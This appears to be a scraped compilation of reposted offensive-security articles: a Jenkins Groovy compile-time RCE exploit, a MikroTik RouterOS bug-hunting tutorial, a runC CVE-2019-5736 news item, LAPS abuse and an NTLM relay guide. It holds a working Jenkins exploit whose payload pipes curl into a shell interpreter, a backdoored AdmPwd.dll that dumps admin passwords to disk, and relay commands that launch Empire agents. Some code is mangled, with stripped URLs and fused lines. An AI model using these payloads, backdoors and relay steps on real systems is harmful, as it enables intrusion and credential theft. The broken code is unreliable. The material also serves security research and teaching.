Back to our exploitation, Pipeline is just a DSL built with Groovy, and Groovy is also a Meta-Programming friendly language. We start reading the Groovy official Meta-Programming manual to find some exploitation ways. In the section 2.1.9, we found the @groovy.transform.ASTTest annotation. Here is its description:

@ASTTest is a special AST transformation meant to help debugging other AST transformations or the Groovy compiler itself. It will let the developer “explore” the AST during compilation and perform assertions on the AST rather than on the result of compilation. This means that this AST transformations gives access to the AST before the Bytecode is produced. @ASTTest can be placed on any annotable node and requires two parameters:

What! perform assertions on the AST? Isn’t that what we want? Let’s write a simple Proof-of-Concept in local environment first:

    assert java.lang.Runtime.getRuntime().exec("touch pwned")
def x
$ ls

$ groovy poc.groovy
$ ls
poc.groovy  pwned

Cool, it works! However, while reproducing this on the remote Jenkins, it shows:

unable to resolve class org.jenkinsci.plugins.workflow.libs.Library

What the hell!!! What’s wrong with that?

With a little bit digging, we found the root cause. This is caused by the Pipeline Shared Groovy Libraries Plugin! In order to reuse functions in Pipeline, Jenkins provides the feature that can import customized library into Pipeline! Jenkins will load this library before every executed Pipeline. As a result, the problem become lack of corresponding library in classPath during compile-time. That’s why the error unsable to resolve class occurs!

How to fix this problem? It’s simple! Just go to Jenkins Plugin Manager and remove the Pipeline Shared Groovy Libraries Plugin! It can fix the problem and then we can execute arbitrary code without any error! But, this is not a good solution because this plugin is installed along with the Pipeline. It’s lame to ask administrator to remove the plugin for code execution! We stop digging this and try to find another way!

Second Attempt

We continue reading the Groovy Meta-Programming manual and found another interesting annotation — @Grab. There is no detailed information about @Grab on the manual. However, we found another article — Dependency management with Grape on search engine!

Oh, from the article we know Grape is a built-in JAR dependency management in Groovy! It can help programmers import the library which are not in classPath. The usage looks like:

@Grab(group='org.springframework', module='spring-orm', version='3.2.5.RELEASE')
import org.springframework.jdbc.core.JdbcTemplate

By using @Grab annotation, it can import the JAR file which is not in classPath during compile-time automatically! If you just want to bypass the Pipeline sandbox via a valid credential and the permission of Pipeline execution, that’s enough. You can follow the PoCproveded by @adamyordan to execute arbitrary commands!

However, without a valid credential and execute() method, this is just an AST parser and you even can’t control files on remote server. So, what can we do? By diving into more about @Grab, we found another interesting annotation — @GrabResolver:

@GrabResolver(name='restlet', root='')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet

If you are smart enough, you would like to change the root parameter to a malicious website! Let’s try this in local environment:

@GrabResolver(name='restlet', root='')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet
''') - - [18/Dec/2018:18:56:54 +0800] "HEAD /org/restlet/org.restlet/1.1.6/org.restlet-1.1.6-javadoc.jar HTTP/1.1" 404 185 "-" "Apache Ivy/2.4.0"

Wow, it works! Now, we believe we can make Jenkins import any malicious library by Grape! However, the next problem is, how to get code execution?

The Way to Code Execution

In the exploitation, the target is always escalating the read primitive or write primitive to code execution! From the previous section, we can write malicious JAR file into remote Jenkins server by Grape. However, the next problem is how to execute code?

By diving into Grape implementation on Groovy, we realized the library fetching is done by the class groovy.grape.GrapeIvy! We started to find is there any way we can leverage, and we noticed an interesting method processOtherServices(…)!

void processOtherServices(ClassLoader loader, File f) {
    try {
        ZipFile zf = new ZipFile(f)
        ZipEntry serializedCategoryMethods = zf.getEntry("META-INF/services/org.codehaus.groovy.runtime.SerializedCategoryMethods")
        if (serializedCategoryMethods != null) {
        ZipEntry pluginRunners = zf.getEntry("META-INF/services/org.codehaus.groovy.plugins.Runners")
        if (pluginRunners != null) {
            processRunners(zf.getInputStream(pluginRunners), f.getName(), loader)
    } catch(ZipException ignore) {
        // ignore files we can't process, e.g. non-jar/zip artifacts
        // TODO log a warning

JAR file is just a subset of ZIP format. In the processOtherServices(…), Grape registers servies if there are some specified entry points. Among them, the Runner interests me. By looking into the implementation of processRunners(…), we found this:

void processRunners(InputStream is, String name, ClassLoader loader) {
    is.text.readLines().each {
        GroovySystem.RUNNER_REGISTRY[name] = loader.loadClass(it.trim()).newInstance()

Here we see the newInstance(). Does it mean that we can call Constructor on any class? Yes, so, we can just create a malicious JAR file, and put the class name into the file META-INF/services/org.codehaus.groovy.plugins.Runners and we can invoke the Constructor and execute arbitrary code!

Here is the full exploit:

public class Poc {
    public Poc(){
        try {
            String payload = "curl | perl -";
            String[] cmds = {"/bin/bash", "-c", payload};
        } catch (Exception e) { }

$ javac
$ mkdir -p META-INF/services/
$ echo Orange > META-INF/services/org.codehaus.groovy.plugins.Runners
$ find .

$ jar cvf poc-1.jar tw/
$ cp poc-1.jar ~/www/tw/orange/poc/1/
$ curl -I http://[your_host]/tw/orange/poc/1/poc-1.jar
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2019 11:10:55 GMT


@GrabResolver(name='', root='http://[your_host]/')%0a
@Grab(group='', module='poc', version='1')%0a
import Orange;



With the exploit, we can gain full access on remote Jenkins server! We use Meta-Programming to import malicious JAR file during compile-time, and executing arbitrary code by the Runner service! Although there is a built-in Groovy Sandbox(Script Security Plugin) on Jenkins to protect the Pipeline, it’s useless because the vulnerability is in compile-time, not in run-time!

Because this is an attack vector on Groovy core, all methods related to the Groovy parser are affected! It breaks the developer’s thought which there is no execution so there is no problem. It is also an attack vector that requires the knowledge about computer science. Otherwise, you cannot think of the Meta-Programming! That’s what makes this vulnerability interesting. Aside from entry points doCheckScriptCompile(...) and toJson(...) I reported, after the vulnerability has been fixed, Mikhail Egorov also found another entry point quickly to trigger this vulnerability!

Apart from that, this vulnerability can also be chained with my previous exploit on Hacking Jenkins Part 1 to bypass the Overall/Read restriction to a well-deserved pre-auth remote code execution. If you fully understand the article, you know how to chain 😛

Thank you for reading this article and hope you like it! Here is the end of Hacking Jenkins series, I will publish more interesting researches in the future 🙂

Make It Rain with MikroTik

Original text by Jacob Baines

Can you hear me in the… front?

I came into work to find an unusually high number of private Slack messages. They all pointed to the same tweet.

Why would this matter to me? I gave a talk at Derbycon about hunting for bugs in MikroTik’s RouterOS. I had a 9am Sunday time slot.

You don’t want a 9am Sunday time slot at Derbycon

Now that Zerodium is paying out six figures for MikroTik vulnerabilities, I figured it was a good time to finally put some of my RouterOS bug hunting into writing. Really, any time is a good time to investigate RouterOS. It’s a fun target. Hell, just preparing this write up I found a new unauthenticated vulnerability. You could too.

Laying the Groundwork

Now I know you’re already looking up Rolex prices, but calm down, Sparky. You still have work to do. Even if you’re just planning to download a simple fuzzer and pray for a pay day, you’ll still need to read this first section.

Acquiring Software

You don’t have to rush to Amazon to acquire a router. MikroTik makes RouterOS ISOs available on their website. The ISO can be used to create a virtual host with VirtualBox or VMWare.

Naturally, Mikrotik published 6.42.12 the day I published this blog

You can also extract the system files from the ISO.

albinolobster@ubuntu:~/6.42.11$ 7z x mikrotik-6.42.11.iso
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,4 CPUs)
Processing archive: mikrotik-6.42.11.iso
Extracting  advanced-tools-6.42.11.npk
Extracting calea-6.42.11.npk
Extracting defpacks
Extracting dhcp-6.42.11.npk
Extracting dude-6.42.11.npk
Extracting gps-6.42.11.npk
Extracting hotspot-6.42.11.npk
Extracting ipv6-6.42.11.npk
Extracting isolinux
Extracting isolinux/
Extracting isolinux/initrd.rgz
Extracting isolinux/isolinux.bin
Extracting isolinux/isolinux.cfg
Extracting isolinux/linux
Extracting isolinux/TRANS.TBL
Extracting kvm-6.42.11.npk
Extracting lcd-6.42.11.npk
Extracting LICENSE.txt
Extracting mpls-6.42.11.npk
Extracting multicast-6.42.11.npk
Extracting ntp-6.42.11.npk
Extracting ppp-6.42.11.npk
Extracting routing-6.42.11.npk
Extracting security-6.42.11.npk
Extracting system-6.42.11.npk
Extracting TRANS.TBL
Extracting ups-6.42.11.npk
Extracting user-manager-6.42.11.npk
Extracting wireless-6.42.11.npk
Extracting [BOOT]/Bootable_NoEmulation.img
Everything is Ok
Folders: 1
Files: 29
Size: 26232176
Compressed: 26335232

MikroTik packages a lot of their software in their custom .npk format. There’s a tool that’ll unpack these, but I prefer to just use binwalk.

albinolobster@ubuntu:~/6.42.11$ binwalk -e system-6.42.11.npk
0 0x0 NPK firmware header, image size: 15616295, image name: "system", description: ""
4096 0x1000 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 9818075 bytes, 1340 inodes, blocksize: 262144 bytes, created: 2018-12-21 09:18:10
9822304 0x95E060 ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9842177 0x962E01 Unix path: /sys/devices/system/cpu
9846974 0x9640BE ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9904147 0x972013 Unix path: /sys/devices/system/cpu
9928025 0x977D59 Copyright string: "Copyright 1995-2005 Mark Adler "
9928138 0x977DCA CRC32 polynomial table, little endian
9932234 0x978DCA CRC32 polynomial table, big endian
9958962 0x97F632 xz compressed data
12000822 0xB71E36 xz compressed data
12003148 0xB7274C xz compressed data
12104110 0xB8B1AE xz compressed data
13772462 0xD226AE xz compressed data
13790464 0xD26D00 xz compressed data
15613512 0xEE3E48 xz compressed data
15616031 0xEE481F Unix path: /var/pdb/system/crcbin/milo 3801732988
albinolobster@ubuntu:~/6.42.11$ ls -o ./_system-6.42.11.npk.extracted/squashfs-root/
total 64
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 bin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 boot
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 dev
lrwxrwxrwx 1 albinolobster 11 Dec 21 04:18 dude -> /flash/dude
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 etc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 flash
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 home
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 initrd
drwxr-xr-x 4 albinolobster 4096 Dec 21 04:18 lib
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 nova
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 old
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 pckg -> /ram/pckg
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 proc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 ram
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 rw -> /flash/rw
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sbin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sys
lrwxrwxrwx 1 albinolobster 7 Dec 21 04:18 tmp -> /rw/tmp
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 usr
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 var

Hack the Box

When looking for vulnerabilities it’s helpful to have access to the target’s filesystem. It’s also nice to be able to run tools, like GDB, locally. However, the shell that RouterOS offers isn’t a normal unix shell. It’s just a command line interface for RouterOS commands.

Who am I?!

Fortunately, I have a work around that will get us root. RouterOS will execute anything stored in the /rw/DEFCONF file due the way the rc.d script S12defconf is written.

Friends don’t let friends use eval

A normal user has no access to that file, but thanks to the magic of VMs and Live CDs you can create the file and insert any commands you want. The exact process takes too many words to explain. Instead I made a video. The screen recording is five minutes long and it goes from VM installation all the way through root telnet access.

With root telnet access you have full control of the VM. You can upload more tooling, attach to processes, watch logs, etc. You’re now ready to explore the router’s attack surface.

Is Anyone Listening?

You can quickly determine the network reachable attack surface thanks to the ps command.

Looks like the router listens on some well known ports (HTTP, FTP, Telnet, and SSH), but also some lesser known ports. btest on port 2000 is the bandwidth-test server. mproxy on 8291 is the service that WinBox interfaces with. WinBox is an administrative tool that runs on Windows. It shares all the same functionality as the Telnet, SSH, and HTTP interfaces.

Hello, I load .dll straight off the router. Yes, that has been a problem. Why do you ask?

The Real Attack Surface

The ps output makes it appear as if there are only a few binaries to bug hunt in. But nothing could be further from the truth. Both the HTTP server and Winbox speak a custom protocol that I’ll refer to as WinboxMessage (the actual code calls it nv::message). The protocol specifies which binary a message should be routed to. In truth, with all packages installed, there are about 90 different network reachable binaries that use the WinboxMessage protocol.

There’s also an easy way to figure out which binaries I’m referring to. A list can be found in each package’s /nova/etc/loader/*.x3 file. x3 is a custom file format so I wrote a parser. The example output goes on for a while so I snipped it a bit.

albinolobster@ubuntu:~/routeros/parse_x3/build$ ./x3_parse -f ~/6.42.11/_system-6.42.11.npk.extracted/squashfs-root/nova/etc/loader/system.x3 

The x3 file also contains each binary’s “SYS TO” identifier. This is the identifier that the WinboxMessage protocol uses to determine where a message should be handled.

Me Talk WinboxMessage Pretty One Day

Knowing which binaries you should be able to reach is useful, but actually knowing how to communicate with them is quite a bit more important. In this section, I’ll walk through a couple of examples.

Getting Started

Let’s say I want to talk to /nova/bin/undo. Where do I start? Let’s start with some code. I’ve written a bunch of C++ that will do all of the WinboxMessage protocol formatting and session handling. I’ve also created a skeleton programthat you can build off of. main is pretty bare.

std::string ip;
std::string port;
if (!parseCommandLine(p_argc, p_argv, ip, port))
Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
std::cerr << "Failed to connect to the remote host"
<< std::endl;

You can see the Winbox_Session class is responsible for connecting to the router. It’s also responsible for authentication logic as well as sending and receiving messages.

Now, from the output above, you know that /nova/bin/undo has a SYS TO identifier of 17. In order to reach undo, you need to update the code to create a message and set the appropriate SYS TO identifier (the new part is bolded).

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
std::cerr << "Failed to connect to the remote host"
<< std::endl;
WinboxMessage msg;

Command and Control

Each message also requires a command. As you’ll see in a little bit, each command will invoke specific functionality. There are some builtin commands (0xfe0000–0xfe00016) used by all handlers and some custom commands that have unique implementations.

Pop /nova/bin/undo into a disassembler and find the nv::Looper::Looperconstructor’s only code cross reference.

Follow the offset to vtable that I’ve labeled undo_handler and you should see the following.

This is the vtable for undo’s WinboxMessage handling. A bunch of the functions directly correspond to the builtin commands I mentioned earlier (e.g. 0xfe0001 is handled by nv::Handler::cmdGetPolicies). You can also see I’ve highlighted the unknown command function. Non-builtin commands get implemented there.

Since the non-builtin commands are usually the most interesting, you’re going to jump into cmdUnknown. You can see it starts with a command based jump table.

It looks like the commands start at 0x80001. Looking through the code a bit, command 0x80002 appears to have a useful string to test against. Let’s see if you can reach the “nothing to redo” code path.

You need to update the skeleton code to request command 0x80002. You’ll also need to add in the send and receive logic. I’ve bolded the new part.

WinboxMessage msg;
std::cout << "req: " << msg.serialize_to_json() << std::endl;
if (!winboxSession.receive(msg))
std::cerr << "Error receiving a response." << std::endl;
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

if (msg.has_error())
std::cerr << msg.get_error_string() << std::endl;

After compiling and executing the skeleton you should get the expected, “nothing to redo.”

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i -p 8291
req: {bff0005:1,uff0006:1,uff0007:524290,Uff0001:[17]}
resp: {uff0003:2,uff0004:2,uff0006:1,uff0008:16646150,sff0009:'nothing to redo',Uff0001:[],Uff0002:[17]}
nothing to redo

There’s Rarely Just One

In the previous example, you looked at the main handler in undo which was addressable simply as 17. However, the majority of binaries have multiple handlers. In the following example, you’ll examine /nova/bin/mproxy’s handler #2. I like this example because it’s the vector for CVE-2018–14847and it helps demystify these weird binary blobs:

My exploit for CVE-2018–14847 delivers a root shell. Just sayin’.

Hunting for Handlers

Open /nova/bin/mproxy in IDA and find the nv::Looper::addHandler import. In 6.42.11, there are only two code cross references to addHandler. It’s easy to identify the handler you’re interested in, handler 2, because the handler identifier is pushed onto the stack right before addHandler is called.

If you look up to where nv::Handler* is loaded into edi then you’ll find the offset for the handler’s vtable. This structure should look very familiar:

Again, I’ve highlighted the unknown command function. The unknown command function for this handler supports seven commands:

  1. Opens a file in /var/pckg/ for writing.
  2. Writes to the open file.
  3. Opens a file in /var/pckg/ for reading.
  4. Reads the open file.
  5. Cancels a file transfer.
  6. Creates a directory in /var/pckg/.
  7. Opens a file in /home/web/webfig/ for reading.

Commands 4, 5, and 7 do not require authentication.

Open a File

Let’s try to open a file in /home/web/webfig/ with command 7. This is the command that the FIRST_PAYLOAD in the exploit-db screenshot uses. If you look at the handling of command 7 in the code, you’ll see the first thing it looks for is a string with the id of 1.

The string is the filename you want to open. What file in /home/web/webfig is interesting?

The real answer is “none of them” look interesting. But list contains a list of the installed packages and their version numbers.

Let’s translate the open file request into WinboxMessage. Returning to the skeleton program, you’ll want to overwrite the set_to and set_commandcode. You’ll also want to insert the add_string. I’ve bolded the new portion again.

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
std::cerr << "Failed to connect to the remote host"
<< std::endl;
WinboxMessage msg;
msg.set_to(2,2); // mproxy, second handler
msg.add_string(1, "list"); // the file to open

std::cout << "req: " << msg.serialize_to_json() << std::endl;
if (!winboxSession.receive(msg))
std::cerr << "Error receiving a response." << std::endl;
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

When running this code you should see something like this:

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i -p 8291
req: {bff0005:1,uff0006:1,uff0007:7,s1:'list',Uff0001:[2,2]}
resp: {u2:1818,ufe0001:3,uff0003:2,uff0006:1,Uff0001:[],Uff0002:[2,2]}

You can see the response from the server contains u2:1818. Look familiar?

1818 is the size of the list

As this is running quite long, I’ll leave the exercise of reading the file’s content up to the reader. This very simple CVE-2018–14847 proof of concept contains all the hints you’ll need.


I’ve shown you how to get the RouterOS software and root a VM. I’ve shown you the attack surface and taught you how to navigate the system binaries. I’ve given you a library to handle Winbox communication and shown you how to use it. If you want to go deeper and nerd out on protocol minutiae then check out my talk. Otherwise, you now know enough to be dangerous.

Good luck and happy hacking!

SensorsTechForum NEWSTHREAT REMOVALREVIEWSFORUMSSEARCH NEWS CVE-2019-5736 Linux Flaw in runC Allows Unauthorized Root Access

Original text by Milena Dimitrova

CVE-2019-5736 is yet another Linux vulnerability discovered in the core runC container code. The runC tool is described as a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime.

CVE-2019-5736 Technical Details

The security flaw potentially affects several open-source container management systems. Shortly said, the flaw allows attackers to get unauthorized, root access to the host operating system, thus escaping Linux container.

In more technical terms, the vulnerability:

allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe, as explained in the official advisory.

The CVE-2019-5736 vulnerability was unearthed by open source security researchers Adam Iwaniuk and Borys Popławski. However, it was publicly disclosed by Aleksa Sarai, a senior software engineer and runC maintainer at SUSE Linux GmbH on Monday.

“I am one of the maintainers of runc (the underlying container runtime underneath Docker, cri-o, containerd, Kubernetes, and so on). We recently had a vulnerability reported which we have verified and have a
patch for,” Sarai wrote.

The researcher also said that a malicious user would be able to run any command (it doesn’t matter if the command is not attacker-controlled) as root within a container in either of these contexts:

– Creating a new container using an attacker-controlled image.
– Attaching (docker exec) into an existing container which the attacker had previous write access to.

It should also be noted that CVE-2019-5736 isn’t blocked by the default AppArmor policy, nor
by the default SELinux policy on Fedora[++], due to the fact that container processes appear to be running as container_runtime_t.

Nonetheless, the flaw is blocked through correct use of user namespaces where the host root is not mapped into the container’s user namespace.

 Related: CVE-2018-14634: Linux Mutagen Astronomy Vulnerability Affects RHEL and Cent OS Distros

CVE-2019-5736 Patch and Mitigation

Red Hat says that the flaw can be mitigated when SELinux is enabled in targeted enforcing mode, a condition which comes by default on RedHat Enterprise Linux, CentOS, and Fedora.

There’s also a patch released by the maintainers of runC available on GitHub. Please note that all projects which are based on runC should apply the patches themselves.

Who’s Affected?

Debian and Ubuntu are vulnerable to the vulnerability, as well as container systems running LXC, a Linux containerization tool prior to Docker. Apache Mesos container code is also affected.

Companies such as Google, Amazon, Docker, and Kubernetes are have also released fixes for the flaw.

Malicious use of Microsoft LAPS

Original text by Akijosberry

LAPS Overview:

LAPS (Local Administrator Password Solution) is a tool for managing local administrator passwords for domain joined computers. It stores passwords/secrets in a confidential attribute in the computer’s corresponding active directory object. LAPS eliminates the risk of lateral movement by generating random passwords of local administrators. LAPS solution is a Group Policy Client Side Extension (CSE) which is installed on all managed machines to perform all management tasks.

Domain administrators and anyone who has full control on computer objects in AD can read and write both pieces of information (i.e., password and expiration timestamp). Password’s stored in AD is protected by ACL, it is up to the sysadmins to define who can and who cannot read the attributes. When transferred over the network, both password and time stamp are encrypted by kerberos and when stored in AD both password and time stamp are stored in clear text.

Components of LAPS:
  • Agent – Group Policy Client Extension(CSE)
    • Event Logging and Random password generation
  • PowerShell Module
    • Solution configuration
  • Active Directory
    • Computer Object, Confidential attribute, Audit trail in security log of domain controller

Firstly, we will identify whether LAPS solution has been installed on the machine which we had gained a foothold. We will leverage powershell cmdlet to identify if the admpwd.dll exist or not.

1Get-ChildItem ‘c:\program files\LAPS\CSE\Admpwd.dll’

The very next step would be identifying who has read access to ms-Mcs-AdmPwd. we can use Powerviewfor identifying users having read access to ms-Mcs-AdmPwd

12345Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs |Where-Object {($_.ObjectType -like 'ms-Mcs-AdmPwd') -and($_.ActiveDirectoryRights -match 'ReadProperty')}

If RSAT(Remote Server Administration Tools) is enabled on the victim machine, then there is an interesting way of identifying user’s having access to ms-Mcs-AdmPwd. we can simply fire the command:

1dsacls.exe 'Path to the AD DS Object'
Dumping LAPS password:

Once you have identified the user’s who has read access to ms-Mcs-AdmPwd, the next thing would be compromising those user accounts and then dumping LAPS password in clear text.

I already did a blog post on ‘Dump LAPS password in clear text‘  and would highly encourage readers to have look at that post as well.

Tip: It is highly recommended to provide ms-Mcs-AdmPwd  read access to only those who actually manage those computer objects and remove unwanted users from having read access.

Poisoning AdmPwd.dll:

Most of the previous research/attacks are focused on the server side (i.e., looking for accounts who can read the passwords) not on the client side. Microsoft’s LAPS is a client side extension which runs a single dll that manages password (admpwd.dll).

LAPS was based on open source solution called “AdmPwd” developed by Jiri Formacek and is a part of microsoft product portfolio since may 2015. The LAPS solution does not have integrity checks or signature verification for dll file. AdmPwd solution is compatible with Microsoft’s LAPS, so let’s poison the dll by compiling the project from source and replace it with the original dll. To replace the original dll administrative privilege is required and at this point we assume the user already has gained administrator privilege by LPE or any other means.

Now let’s add these 3-4 lines in the AdmPwd solution and compile the malicious dll. These lines will be added where the new password and time stamp would be reported to the AD.

1234wofstream backdoor;"c:\\backdoor.txt");backdoor << newPwd;backdoor.close();

In this way adversary will appear normal, passwords would be synced and will also comply with LAPS policy.

BONUS: Persistence of clear text password *

*Persistence till the time poisoned dll is unchanged.

  • Validate the Integrity/Signature of admpwd.dll
  • File Integrity Monitoring (FIM) policy can be created to monitor and changes/modification to the dll.
  • Application whitelisting can be applied to detect/prevent poisoning.
  • Increase LAPS logging level by setting the registry value to 2 (Verbose mode, Log everything):

Note:  Above methods are just my ramblings, I am not sure whether some of these would detect or prevent.

Modifying searchFlags attribute:

The attribute of our interest is ms-Mcs-AdmPwd which is a confidential attribute.Let’s first identify searchFlags attribute of ms-Mcs-AdmPwd. We will be using active directory PS module.


The searchFlags attribute value is 904 (0x388). From this value we need to remove the 7th bit which is the confidential attribute. CF which is the 7 th bit (0x00000080) ie., After removing the confidential value(0x388-0x80) the new value is 0x308 ie., 776. We will leverage DC Shadow attack to modify the searchFlags attribute.

  • Anything which detects DC Shadow attack eg.,ALSID Team’s powershell script. ( It detects using the “LDAP_SERVER_NOTIFICATION_OID” and tracks what changes are registered in the AD infrastructure).
  • Microsoft ATA also detects malicious replications.
  • It can also be detected by comparing the metadata of the searchFlags attribute or even looking at the LocalChangeUSN which is inconsistent with searchFlags attribute.

Note: In my lab setup when i removed the confidential attribute from one DC it gets replicated to other DC’s as well (i.e., searchFlags attribute value 776 gets replicated to other DC’s). Another thing i noticed is after every change the SerachFlags version gets increased but in my lab setup it was not increasing after 10. If you find something different do let me know.


Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes)

( Original text by byt3bl33d3r )

This blog post is mainly aimed to be a very ‘cut & dry’ practical guide to help clear up any confusion regarding NTLM relaying. Talking to pentesters I’ve noticed that there seems to be a lot of general confusion regarding what you can do with those pesky hashes you get with Responder. I also noticed there doesn’t seem to be an up to date guide on how to do this on the interwebs, and the articles that I did see about the subject either reference tools that are outdated, broken and/or not maintained anymore.

I won’t go into detail on all the specifics since there are a TON of papers out there detailing how the attack actually works, this one from SANS is a ok when it comes to the theory behind the attack.

Before we dive into the thick of it we need make sure we are on the same page with a couple of things.

NTLM vs. NTLMv1/v2 vs. Net-NTLMv1/v2

This is where the confusion starts for a lot of people and quite frankly I don’t blame them because all of the articles about this attack talk about NTLMv1/v2, so when they see Net-NTLMv1/v2 anywhere obviously people wonder if it’s the same thing.

Edit 06/05/2017 — Updated the TL;DR as it was brought to my attention the way I phrased it was still confusing.

TL;DR NTLMv1/v2 is a shorthand for Net-NTLMv1/v2 and hence are the same thing.

However, NTLM (without v1/v2) means something completely different.

NTLM hashes are stored in the Security Account Manager (SAM) database and in Domain Controller’s NTDS.dit database. They look like this:


Contrary to what you’d expect, the LM hash is the one before the semicolon and the NT hash is the one after the semicolon. Starting with Windows Vista and Windows Server 2008, by default, only the NT hash is stored.

Net-NTLM hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user’s NT hash). Here’s an example of a Net-NTLMv2 (a.k.a NTLMv2) hash:


(This hash was taken from the Hashcat example hash page here)

From a pentesting perspective:

  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.

You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller’s NTDS.dit database or from Mimikatz (Fun fact, although you can’t get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that’s perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.

You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.

This article is going to be talking about what you can do with Net-NTLM in modern windows environments.

Relaying 101

Since MS08-068 you cannot relay a Net-NTLM hash back to the same machine you got it from (e.g. the ‘reflective’ attack) unless you’re performing a cross-protocol relay (which is an entirely different topic). However you can still relay the hash to another machine.

TL;DR you don’t have to crack the hashes you get from Responder, you can directly relay them to other machines!

What’s really cool about this? You can use Responder in combination with a relay tool to automatically intercept connections and relay authentication hashes!

The only caveat to this attack? SMB Signing needs to be disabled on the machine you’re relaying too. With the exception of Windows Server OS’s, all Windows operating systems have SMB Signing disabled by default.

Personally, I consider SMB Signing to be one of the most overlooked and underrated security settings in Windows specifically because of this attack and how easy it allows for attackers to gain an initial foothold.

Setting up

Grab Responder (do not use the version of Responder on SpiderLab’s Github repository as it isn’t maintained anymore, you should be using lgandx’s fork), edit the Responder.conf file and turn off the SMB and HTTP servers:

[Responder Core]

; Servers to start
SQL = On
SMB = Off     # Turn this off
Kerberos = On
FTP = On
POP = On
HTTP = Off    # Turn this off
DNS = On

Now you need a relaying tool.

There are 2 main tools that are maintained and updated regularly that can be used to perform relay attacks with Net-NTLMv1/v2 hashes:

I personally use so I’ll stick with that for this blogpost.

Install Impacket using pip or manually by git cloning the repo and running the setup file and it will put the script in your path.

Now you need list of targets to relay to.

How you do that is up to you. I personally use CrackMapExec: V4 has a handy --gen-relay-list flag just for this:

cme smb <CIDR> --gen-relay-list targets.txt

The above command will generate a list of all hosts with SMB Signing disabled and output them to the specified file.

0wning Stuff

Now that you have everything you need, fire up Responder in one terminal window:

python -I <interface> -r -d -w

And in another: -tf targets.txt

By default, upon a successful relay will dump the SAM database of the target.

Buuuuut, you know whats even better? How about executing a command? -tf targets.txt -c <insert your Empire Powershell launcher here>

Now, every time successfully relays a Net-NTLM hash, you will get an Empire agent! How cool is that??!

Here’s a video of how it looks like in practice:

Let’s recap

  1. We’re using Responder to intercept authentication attempts (Net-NTLM hashes) via Multicast/Broadcast protocols.
  2. However, since we turned off Responder’s SMB and HTTP servers and have running, those authentication attempts get automatically passed to’s SMB and HTTP servers
  3. takes over and relays those hashes to our target list. If the relay is successful it will execute our Empire launcher and give us an Empire Agent on the target machine.


SMB Relaying attacks are very much still relevant. Having SMB Signing disabled in combination with Multicast/Broadcast protocols allow attackers to seamlessly intercept authentication attempts, relay them to other machines and gain an initial foothold on an Active Directory network in a matter of minutes.

Now, combine this with something like DeathStar and you have automated everything from getting a foothold to gaining Domain Admin rights!

Shout outs

These are the people responsible for these amazing tools, hard work and research. You should be following them everywhere!